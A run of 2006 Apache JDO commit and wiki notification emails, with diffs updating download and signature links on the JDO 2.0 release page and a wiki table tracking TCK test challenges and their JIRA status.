@@ <subsection name="Enhancer"> <p> -<a href="[preferred]/java-repository/org.apache.jdo/jars/jdo2-enhancer-2.0.jar">jdo2-enhancer-2.0.jar</a> -[<a href="http://www.apache.org/dist/java-repository/org.apache.jdo/jars/jdo2-enhancer-2.0.jar.asc">PGP</a>] -[<a href="http://www.apache.org/dist/java-repository/org.apache.jdo/jars/jdo2-enhancer-2.0.jar.md5">MD5</a>] + <a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-enhancer-2.0.jar">jdo2-enhancer-2.0.jar</a> + [<a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-enhancer-2.0.jar.asc">PGP</a>] + [<a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-enhancer-2.0.jar.md5">MD5</a>] </p> <p> -<a href="[preferred]/java-repository/org.apache.jdo/poms/jdo2-enhancer-2.0.pom">jdo2-enhancer-2.0.pom</a> -[<a href="http://www.apache.org/dist/java-repository/org.apache.jdo/poms/jdo2-enhancer-2.0.pom.asc">PGP</a>] -[<a href="http://www.apache.org/dist/java-repository/org.apache.jdo/poms/jdo2-enhancer-2.0.pom.md5">MD5</a>] +<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-enhancer-2.0.pom">jdo2-enhancer-2.0.pom</a> +[<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-enhancer-2.0.pom.asc">PGP</a>] +[<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-enhancer-2.0.pom.md5">MD5</a>] </p> <p> <a href="[preferred]/db/jdo/2.0/jdo2-enhancer-2.0-src.zip">jdo2-enhancer-2.0-src.zip</a> @@ -102,14 +104,14 @@ <subsection name="Core"> <p> -<a href="[preferred]/java-repository/org.apache.jdo/jars/jdo2-core-2.0.jar">jdo2-core-2.0.jar</a> -[<a href="http://www.apache.org/dist/java-repository/org.apache.jdo/jars/jdo2-core-2.0.jar.asc">PGP</a>] -[<a href="http://www.apache.org/dist/java-repository/org.apache.jdo/jars/jdo2-core-2.0.jar.md5">MD5</a>] + <a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-core-2.0.jar">jdo2-core-2.0.jar</a> + [<a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-core-2.0.jar.asc">PGP</a>] + [<a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-core-2.0.jar.md5">MD5</a>] </p> <p> -<a href="[preferred]/java-repository/org.apache.jdo/poms/jdo2-core-2.0.pom">jdo2-core-2.0.pom</a> -[<a href="http://www.apache.org/dist/java-repository/org.apache.jdo/poms/jdo2-core-2.0.pom.asc">PGP</a>] -[<a href="http://www.apache.org/dist/java-repository/org.apache.jdo/poms/jdo2-core-2.0.pom.md5">MD5</a>] +<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-core-2.0.pom">jdo2-core-2.0.pom</a> +[<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-core-2.0.pom.asc">PGP</a>] +[<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-core-2.0.pom.md5">MD5</a>] </p> <p> <a href="[preferred]/db/jdo/2.0/jdo2-core-2.0-src.zip">jdo2-core-2.0-src.zip</a> From [email protected] Sat Sep 23 00:42:05 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10294 invoked from network); 23 Sep 2006 00:42:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Sep 2006 00:42:05 -0000 Received: (qmail 27014 invoked by uid 500); 23 Sep 2006 00:42:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27003 invoked by uid 99); 23 Sep 2006 00:42:04 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 22 Sep 2006 17:42:04 -0700 Authentication-Results: idunn.apache.osuosl.org [email protected]; spf=permerror X-ASF-Spam-Status: No, hits=-9.4 required=5.0 tests=ALL_TRUSTED,NO_REAL_NAME Received-SPF: error (idunn.apache.osuosl.org: domain apache.org from 161.129.204.104 cause and error) Received: from [161.129.204.104] ([161.129.204.104:65023] helo=eris.apache.org) by idunn.apache.osuosl.org (ecelerity 161.129.204.104 r(12930)) with ESMTP id 29/41-25038-AD284154 for <[email protected]>; Fri, 22 Sep 2006 17:42:03 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id 10A391A981A; Fri, 22 Sep 2006 17:42:00 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r449133 - in /db/jdo/site: docs/releases/release-2.0.html xdocs/releases/release-2.0.xml Date: Sat, 23 Sep 2006 00:41:59 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: mcaisse Date: Fri Sep 22 17:41:59 2006 New Revision: 449133 URL: http://svn.apache.org/viewvc?view=rev&rev=449133 Log: JDO-406 - some poms needed old links Modified: db/jdo/site/docs/releases/release-2.0.html db/jdo/site/xdocs/releases/release-2.0.xml Modified: db/jdo/site/docs/releases/release-2.0.html URL: http://svn.apache.org/viewvc/db/jdo/site/docs/releases/release-2.0.html?view=diff&rev=449133&r1=449132&r2=449133 ============================================================================== --- db/jdo/site/docs/releases/release-2.0.html (original) +++ db/jdo/site/docs/releases/release-2.0.html Fri Sep 22 17:41:59 2006 @@ -229,12 +229,12 @@ <blockquote> <p> <a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-enhancer-2.0.jar">jdo2-enhancer-2.0.jar</a> - [<a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-enhancer-2.0.jar.asc">PGP</a>] + [<a href="http://people.apache.org/repo/m1-ibiblio-rsync-repository/org.apache.jdo/jars/jdo2-enhancer-2.0.jar.asc">PGP</a>] [<a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-enhancer-2.0.jar.md5">MD5</a>] </p> <p> <a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-enhancer-2.0.pom">jdo2-enhancer-2.0.pom</a> -[<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-enhancer-2.0.pom.asc">PGP</a>] +[<a href="http://people.apache.org/repo/m1-ibiblio-rsync-repository/org.apache.jdo/poms/jdo2-enhancer-2.0.pom.asc">PGP</a>] [<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-enhancer-2.0.pom.md5">MD5</a>] </p> <p> @@ -261,12 +261,12 @@ <blockquote> <p> <a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-core-2.0.jar">jdo2-core-2.0.jar</a> - [<a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-core-2.0.jar.asc">PGP</a>] + [<a href="http://people.apache.org/repo/m1-ibiblio-rsync-repository/org.apache.jdo/jars/jdo2-core-2.0.jar.asc">PGP</a>] [<a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-core-2.0.jar.md5">MD5</a>] </p> <p> <a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-core-2.0.pom">jdo2-core-2.0.pom</a> -[<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-core-2.0.pom.asc">PGP</a>] +[<a href="http://people.apache.org/repo/m1-ibiblio-rsync-repository/org.apache.jdo/poms/jdo2-core-2.0.pom.asc">PGP</a>] [<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-core-2.0.pom.md5">MD5</a>] </p> <p> Modified: db/jdo/site/xdocs/releases/release-2.0.xml URL: http://svn.apache.org/viewvc/db/jdo/site/xdocs/releases/release-2.0.xml?view=diff&rev=449133&r1=449132&r2=449133 ============================================================================== --- db/jdo/site/xdocs/releases/release-2.0.xml (original) +++ db/jdo/site/xdocs/releases/release-2.0.xml Fri Sep 22 17:41:59 2006 @@ -82,12 +82,12 @@ <subsection name="Enhancer"> <p> <a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-enhancer-2.0.jar">jdo2-enhancer-2.0.jar</a> - [<a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-enhancer-2.0.jar.asc">PGP</a>] + [<a href="http://people.apache.org/repo/m1-ibiblio-rsync-repository/org.apache.jdo/jars/jdo2-enhancer-2.0.jar.asc">PGP</a>] [<a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-enhancer-2.0.jar.md5">MD5</a>] </p> <p> <a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-enhancer-2.0.pom">jdo2-enhancer-2.0.pom</a> -[<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-enhancer-2.0.pom.asc">PGP</a>] +[<a href="http://people.apache.org/repo/m1-ibiblio-rsync-repository/org.apache.jdo/poms/jdo2-enhancer-2.0.pom.asc">PGP</a>] [<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-enhancer-2.0.pom.md5">MD5</a>] </p> <p> @@ -105,12 +105,12 @@ <subsection name="Core"> <p> <a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-core-2.0.jar">jdo2-core-2.0.jar</a> - [<a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-core-2.0.jar.asc">PGP</a>] + [<a href="http://people.apache.org/repo/m1-ibiblio-rsync-repository/org.apache.jdo/jars/jdo2-core-2.0.jar.asc">PGP</a>] [<a href="http://www.ibiblio.org/maven/org.apache.jdo/jars/jdo2-core-2.0.jar.md5">MD5</a>] </p> <p> <a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-core-2.0.pom">jdo2-core-2.0.pom</a> -[<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-core-2.0.pom.asc">PGP</a>] +[<a href="http://people.apache.org/repo/m1-ibiblio-rsync-repository/org.apache.jdo/poms/jdo2-core-2.0.pom.asc">PGP</a>] [<a href="http://www.ibiblio.org/maven/org.apache.jdo/poms/jdo2-core-2.0.pom.md5">MD5</a>] </p> <p> From [email protected] Sat Sep 23 00:50:30 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11373 invoked from network); 23 Sep 2006 00:50:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Sep 2006 00:50:29 -0000 Received: (qmail 33255 invoked by uid 500); 23 Sep 2006 00:50:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33244 invoked by uid 99); 23 Sep 2006 00:50:29 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 22 Sep 2006 17:50:29 -0700 Authentication-Results: idunn.apache.osuosl.org [email protected]; spf=permerror X-ASF-Spam-Status: No, hits=-9.4 required=5.0 tests=ALL_TRUSTED,NO_REAL_NAME Received-SPF: error (idunn.apache.osuosl.org: domain apache.org from 161.129.204.104 cause and error) Received: from [161.129.204.104] ([161.129.204.104:56943] helo=eris.apache.org) by idunn.apache.osuosl.org (ecelerity 161.129.204.104 r(12930)) with ESMTP id CD/71-25038-4D484154 for <[email protected]>; Fri, 22 Sep 2006 17:50:29 -0700 Received: by eris.apache.org (Postfix, from userid 65534) id 0F4D81A981A; Fri, 22 Sep 2006 17:50:26 -0700 (PDT) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r449134 - in /db/jdo/site: docs/releases/release-2.0.html xdocs/releases/release-2.0.xml Date: Sat, 23 Sep 2006 00:50:25 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.1.0 Message-Id: <[email protected]> X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Author: mcaisse Date: Fri Sep 22 17:50:25 2006 New Revision: 449134 URL: http://svn.apache.org/viewvc?view=rev&rev=449134 Log: JDO-406 Modified: db/jdo/site/docs/releases/release-2.0.html db/jdo/site/xdocs/releases/release-2.0.xml Modified: db/jdo/site/docs/releases/release-2.0.html URL: http://svn.apache.org/viewvc/db/jdo/site/docs/releases/release-2.0.html?view=diff&rev=449134&r1=449133&r2=449134 ============================================================================== --- db/jdo/site/docs/releases/release-2.0.html (original) +++ db/jdo/site/docs/releases/release-2.0.html Fri Sep 22 17:50:25 2006 @@ -193,6 +193,16 @@ [<a href="http://www.ibiblio.org/maven/javax.jdo/poms/jdo2-api-2.0.pom.asc">PGP</a>] [<a href="http://www.ibiblio.org/maven/javax.jdo/poms/jdo2-api-2.0.pom.md5">MD5</a>] </p> + <p> +<a href="[preferred]/db/jdo/2.0/jdo2-api-2.0-src.zip">jdo2-api-2.0-src.zip</a> +[<a href="http://www.apache.org/dist/db/jdo/2.0/jdo2-api-2.0-src.zip.asc">PGP</a>] +[<a href="http://www.apache.org/dist/db/jdo/2.0/jdo2-api-2.0-src.zip.md5">MD5</a>] +</p> + <p> +<a href="[preferred]/db/jdo/2.0/jdo2-api-2.0-src.tar.gz">jdo2-api-2.0-src.tar.gz</a> +[<a href="http://www.apache.org/dist/db/jdo/2.0/jdo2-api-2.0-src.tar.gz.asc">PGP</a>] +[<a href="http://www.apache.org/dist/db/jdo/2.0/jdo2-api-2.0-src.tar.gz.md5">MD5</a>] +</p> </blockquote> </td></tr> <tr><td><br/></td></tr> Modified: db/jdo/site/xdocs/releases/release-2.0.xml URL: http://svn.apache.org/viewvc/db/jdo/site/xdocs/releases/release-2.0.xml?view=diff&rev=449134&r1=449133&r2=449134 ============================================================================== --- db/jdo/site/xdocs/releases/release-2.0.xml (original) +++ db/jdo/site/xdocs/releases/release-2.0.xml Fri Sep 22 17:50:25 2006 @@ -52,7 +52,6 @@ [<a href="http://www.ibiblio.org/maven/javax.jdo/poms/jdo2-api-2.0.pom.asc">PGP</a>] [<a href="http://www.ibiblio.org/maven/javax.jdo/poms/jdo2-api-2.0.pom.md5">MD5</a>] </p> -<!-- api src not available?? <p> <a href="[preferred]/db/jdo/2.0/jdo2-api-2.0-src.zip">jdo2-api-2.0-src.zip</a> [<a href="http://www.apache.org/dist/db/jdo/2.0/jdo2-api-2.0-src.zip.asc">PGP</a>] @@ -63,7 +62,6 @@ [<a href="http://www.apache.org/dist/db/jdo/2.0/jdo2-api-2.0-src.tar.gz.asc">PGP</a>] [<a href="http://www.apache.org/dist/db/jdo/2.0/jdo2-api-2.0-src.tar.gz.md5">MD5</a>] </p> ---> </subsection> <subsection name="TCK"> From [email protected] Tue Sep 26 21:15:30 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88017 invoked from network); 26 Sep 2006 21:15:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Sep 2006 21:15:30 -0000 Received: (qmail 30220 invoked by uid 500); 26 Sep 2006 21:15:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 30209 invoked by uid 99); 26 Sep 2006 21:15:22 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 26 Sep 2006 14:15:22 -0700 X-ASF-Spam-Status: No, hits=0.0 required=5.0 tests= Received: from [161.129.204.104] ([161.129.204.104:57388] helo=ajax.apache.org) by idunn.apache.osuosl.org (ecelerity 161.129.204.104 r(12930)) with ESMTP id 30/30-16382-96899154 for <[email protected]>; Tue, 26 Sep 2006 14:15:22 -0700 Received: from ajax.apache.org (localhost [161.129.204.104]) by ajax.apache.org (Postfix) with ESMTP id D7476D49BE for <[email protected]>; Tue, 26 Sep 2006 22:15:18 +0100 (BST) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Apache Wiki <[email protected]> To: [email protected] Date: Tue, 26 Sep 2006 21:15:18 -0000 Message-ID: <[email protected]> Subject: [Jdo Wiki] Update of "TCKChallenges" by MichaelBouschen X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Dear Wiki user, You have subscribed to a wiki page or wiki category on "Jdo Wiki" for change notification. The following page has been changed by MichaelBouschen: http://wiki.apache.org/jdo/TCKChallenges The comment on the change is: First version of TCKChallenges New page: = TCK20 Challenges = Status is one of '''sustained''', '''resolved in <release>''', '''invalid''', '''pending''' || '''Date''' || '''Submitter''' || '''Test Class''' || '''JIRA''' || '''Status''' || '''Comment''' || || 25-Sep-2006 || Stephen Kim, BEA || Calling``Jdo``Postload || [http://issues.apache.org/jira/browse/JDO-412 JDO-412] || pending || || || 25-Sep-2006 || Stephen Kim, BEA || Calling``Jdo``Preclear || [http://issues.apache.org/jira/browse/JDO-401 JDO-401], [http://issues.apache.org/jira/browse/JDO-413 JDO-413] || pending || || || 25-Sep-2006 || Stephen Kim, BEA || Modification``Of``Nontransactional``Nonpersistent``Fields || [http://issues.apache.org/jira/browse/JDO-412 JDO-412] || pending || || || 25-Sep-2006 || Stephen Kim, BEA || No``Access``To``Fields``After``Predelete || [http://issues.apache.org/jira/browse/JDO-413 JDO-413] || pending || || || 25-Sep-2006 || Stephen Kim, BEA || Is``Transactional``False || [http://issues.apache.org/jira/browse/JDO-409 JDO-409] || pending || || || 25-Sep-2006 || Stephen Kim, BEA || Data``Store``Connection || [http://issues.apache.org/jira/browse/JDO-415 JDO-415] || pending || || || 25-Sep-2006 || Stephen Kim, BEA || Nontransactional``Write``Test || [http://issues.apache.org/jira/browse/JDO-399 JDO-399] || pending || || || 25-Sep-2006 || Stephen Kim, BEA || State``Transitions || [http://issues.apache.org/jira/browse/JDO-419 JDO-419], [http://issues.apache.org/jira/browse/JDO-424 JDO-424] || pending || || || 25-Sep-2006 || Stephen Kim, BEA || State``Transitions``Returned``Objects || [http://issues.apache.org/jira/browse/JDO-427 JDO-427], [http://issues.apache.org/jira/browse/JDO-428 JDO-428], [http://issues.apache.org/jira/browse/JDO-429 JDO-429] || pending || || || 25-Sep-2006 || Stephen Kim, BEA || Delete``Persistent``All || [http://issues.apache.org/jira/browse/JDO-411 JDO-411] || pending || || || 25-Sep-2006 || Stephen Kim, BEA || Delete``Query``Elements || [http://issues.apache.org/jira/browse/JDO-411 JDO-411] || pending || || || 25-Sep-2006 || Stephen Kim, BEA || Null``Collections``And``Is``Empty || [http://issues.apache.org/jira/browse/JDO-410 JDO-410] || pending || || || 25-Sep-2006 || Stephen Kim, BEA || Aggregate``Result||[http://issues.apache.org/jira/browse/JDO-410 JDO-4120]||pending || || From [email protected] Thu Sep 28 12:05:43 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 31181 invoked from network); 28 Sep 2006 12:05:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Sep 2006 12:05:43 -0000 Received: (qmail 8767 invoked by uid 500); 28 Sep 2006 12:05:42 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 8708 invoked by uid 99); 28 Sep 2006 12:05:42 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 28 Sep 2006 05:05:42 -0700 X-ASF-Spam-Status: No, hits=0.0 required=5.0 tests= Received: from [161.129.204.104] ([161.129.204.104:59717] helo=ajax.apache.org) by idunn.apache.osuosl.org (ecelerity 161.129.204.104 r(12930)) with ESMTP id 6D/A0-05478-C8ABB154 for <[email protected]>; Thu, 28 Sep 2006 05:05:37 -0700 Received: from ajax.apache.org (localhost [161.129.204.104]) by ajax.apache.org (Postfix) with ESMTP id 3D92ED49BE for <[email protected]>; Thu, 28 Sep 2006 13:04:47 +0100 (BST) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Apache Wiki <[email protected]> To: [email protected] Date: Thu, 28 Sep 2006 12:04:47 -0000 Message-ID: <[email protected]> Subject: [Jdo Wiki] Update of "FrontPage" by MichaelBouschen X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Dear Wiki user, You have subscribed to a wiki page or wiki category on "Jdo Wiki" for change notification. The following page has been changed by MichaelBouschen: http://wiki.apache.org/jdo/FrontPage The comment on the change is: Added link to TCKChallenges page. ------------------------------------------------------------------------------ Information for developers of the JDO TCK is found at TechnologyCompatibilityKit + The list of TCK20 challenges is found at ["TCKChallenges"] + = Releases = Apache JDO 2.0 beta is now available. See the [http://db.apache.org/jdo/index.html Apache JDO web site] for more information. From [email protected] Thu Sep 28 12:17:09 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35475 invoked from network); 28 Sep 2006 12:17:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 28 Sep 2006 12:17:09 -0000 Received: (qmail 26520 invoked by uid 500); 28 Sep 2006 12:17:09 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 26509 invoked by uid 99); 28 Sep 2006 12:17:09 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 28 Sep 2006 05:17:09 -0700 X-ASF-Spam-Status: No, hits=0.0 required=5.0 tests= Received: from [161.129.204.104] ([161.129.204.104:42864] helo=ajax.apache.org) by idunn.apache.osuosl.org (ecelerity 161.129.204.104 r(12930)) with ESMTP id B9/D0-05478-50DBB154 for <[email protected]>; Thu, 28 Sep 2006 05:16:11 -0700 Received: from ajax.apache.org (localhost [161.129.204.104]) by ajax.apache.org (Postfix) with ESMTP id 24651D49BE for <[email protected]>; Thu, 28 Sep 2006 13:15:06 +0100 (BST) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Apache Wiki <[email protected]> To: [email protected] Date: Thu, 28 Sep 2006 12:15:06 -0000 Message-ID: <[email protected]> Subject: [Jdo Wiki] Update of "TCKChallenges" by MichaelBouschen X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Dear Wiki user, You have subscribed to a wiki page or wiki category on "Jdo Wiki" for change notification. The following page has been changed by MichaelBouschen: http://wiki.apache.org/jdo/TCKChallenges ------------------------------------------------------------------------------ = TCK20 Challenges = - Status is one of '''sustained''', '''resolved in <release>''', '''invalid''', '''pending''' + Status is one of '''pending''', '''fixed''', '''integrated in <release>''', '''invalid''' || '''Date''' || '''Submitter''' || '''Test Class''' || '''JIRA''' || '''Status''' || '''Comment''' || || 25-Sep-2006 || Stephen Kim, BEA || Calling``Jdo``Postload || [http://issues.apache.org/jira/browse/JDO-412 JDO-412] || pending || || From [email protected] Fri Sep 29 10:08:57 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 34901 invoked from network); 29 Sep 2006 10:08:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 29 Sep 2006 10:08:57 -0000 Received: (qmail 28987 invoked by uid 500); 29 Sep 2006 10:08:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jdo-commits.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 28976 invoked by uid 99); 29 Sep 2006 10:08:56 -0000 Received: from idunn.apache.osuosl.org (HELO idunn.apache.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 29 Sep 2006 03:08:56 -0700 X-ASF-Spam-Status: No, hits=0.0 required=5.0 tests= Received: from [161.129.204.104] ([161.129.204.104:35727] helo=ajax.apache.org) by idunn.apache.osuosl.org (ecelerity 161.129.204.104 r(12930)) with ESMTP id 81/50-11690-7B0FC154 for <[email protected]>; Fri, 29 Sep 2006 03:08:55 -0700 Received: from ajax.apache.org (localhost [161.129.204.104]) by ajax.apache.org (Postfix) with ESMTP id 82CE8D49C0 for <[email protected]>; Fri, 29 Sep 2006 11:08:52 +0100 (BST) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit From: Apache Wiki <[email protected]> To: [email protected] Date: Fri, 29 Sep 2006 10:08:52 -0000 Message-ID: <[email protected]> Subject: [Jdo Wiki] Update of "TCKChallenges" by MichaelBouschen X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Dear Wiki user, You have subscribed to a wiki page or wiki category on "Jdo Wiki" for change notification. The following page has been changed by MichaelBouschen: http://wiki.apache.org/jdo/TCKChallenges The comment on the change is: Updated the status of a couple of challenges ------------------------------------------------------------------------------ || '''Date''' || '''Submitter''' || '''Test Class''' || '''JIRA''' || '''Status''' || '''Comment''' || || 25-Sep-2006 || Stephen Kim, BEA || Calling``Jdo``Postload || [http://issues.apache.org/jira/browse/JDO-412 JDO-412] || pending || || - || 25-Sep-2006 || Stephen Kim, BEA || Calling``Jdo``Preclear || [http://issues.apache.org/jira/browse/JDO-401 JDO-401], [http://issues.apache.org/jira/browse/JDO-413 JDO-413] || pending || || + || 25-Sep-2006 || Stephen Kim, BEA || Calling``Jdo``Preclear || [http://issues.apache.org/jira/browse/JDO-401 JDO-401], [http://issues.apache.org/jira/browse/JDO-413 JDO-413] || JDO-401 fixed || JDO-401 is fixed in the trunk. Question: is JDO-413 related to test class Calling``Jdo``Preclear? || || 25-Sep-2006 || Stephen Kim, BEA || Modification``Of``Nontransactional``Nonpersistent``Fields || [http://issues.apache.org/jira/browse/JDO-412 JDO-412] || pending || || - || 25-Sep-2006 || Stephen Kim, BEA || No``Access``To``Fields``After``Predelete || [http://issues.apache.org/jira/browse/JDO-413 JDO-413] || pending || || + || 25-Sep-2006 || Stephen Kim, BEA || No``Access``To``Fields``After``Predelete || [http://issues.apache.org/jira/browse/JDO-413 JDO-413] || pending || Patch available and reviewed, but not yet checked in. || - || 25-Sep-2006 || Stephen Kim, BEA || Is``Transactional``False || [http://issues.apache.org/jira/browse/JDO-409 JDO-409] || pending || || + || 25-Sep-2006 || Stephen Kim, BEA || Is``Transactional``False || [http://issues.apache.org/jira/browse/JDO-409 JDO-409] || fixed || JDO-409 is a duplicate of JDO-400. JDO-400 is fixed in the trunk. || || 25-Sep-2006 || Stephen Kim, BEA || Data``Store``Connection || [http://issues.apache.org/jira/browse/JDO-415 JDO-415] || pending || || - || 25-Sep-2006 || Stephen Kim, BEA || Nontransactional``Write``Test || [http://issues.apache.org/jira/browse/JDO-399 JDO-399] || pending || || + || 25-Sep-2006 || Stephen Kim, BEA || Nontransactional``Write``Test || [http://issues.apache.org/jira/browse/JDO-399 JDO-399] || fixed || JDO-399 is fixed in the trunk. || || 25-Sep-2006 || Stephen Kim, BEA || State``Transitions || [http://issues.apache.org/jira/browse/JDO-419 JDO-419], [http://issues.apache.org/jira/browse/JDO-424 JDO-424] || pending || || || 25-Sep-2006 || Stephen Kim, BEA || State``Transitions``Returned``Objects || [http://issues.apache.org/jira/browse/JDO-427 JDO-427], [http://issues.apache.org/jira/browse/JDO-428 JDO-428], [http://issues.apache.org/jira/browse/JDO-429 JDO-429] || pending || || - || 25-Sep-2006 || Stephen Kim, BEA || Delete``Persistent``All || [http://issues.apache.org/jira/browse/JDO-411 JDO-411] || pending || || + || 25-Sep-2006 || Stephen Kim, BEA || Delete``Persistent``All || [http://issues.apache.org/jira/browse/JDO-411 JDO-411] || fixed || JDO-411 is fixed in the trunk. || - || 25-Sep-2006 || Stephen Kim, BEA || Delete``Query``Elements || [http://issues.apache.org/jira/browse/JDO-411 JDO-411] || pending || || + || 25-Sep-2006 || Stephen Kim, BEA || Delete``Query``Elements || [http://issues.apache.org/jira/browse/JDO-411 JDO-411] || fixed || JDO-411 is fixed in the trunk. || - || 25-Sep-2006 || Stephen Kim, BEA || Null``Collections``And``Is``Empty || [http://issues.apache.org/jira/browse/JDO-410 JDO-410] || pending || || + || 25-Sep-2006 || Stephen Kim, BEA || Null``Collections``And``Is``Empty || [http://issues.apache.org/jira/browse/JDO-410 JDO-410] || pending || Question: is JDO-410 related to test class Null``Collections``And``Is``Empty? || - || 25-Sep-2006 || Stephen Kim, BEA || Aggregate``Result||[http://issues.apache.org/jira/browse/JDO-410 JDO-4120]||pending || || + || 25-Sep-2006 || Stephen Kim, BEA || Aggregate``Result||[http://issues.apache.org/jira/browse/JDO-410 JDO-410]|| fixed || JDO-410 is fixed in the trunk. ||
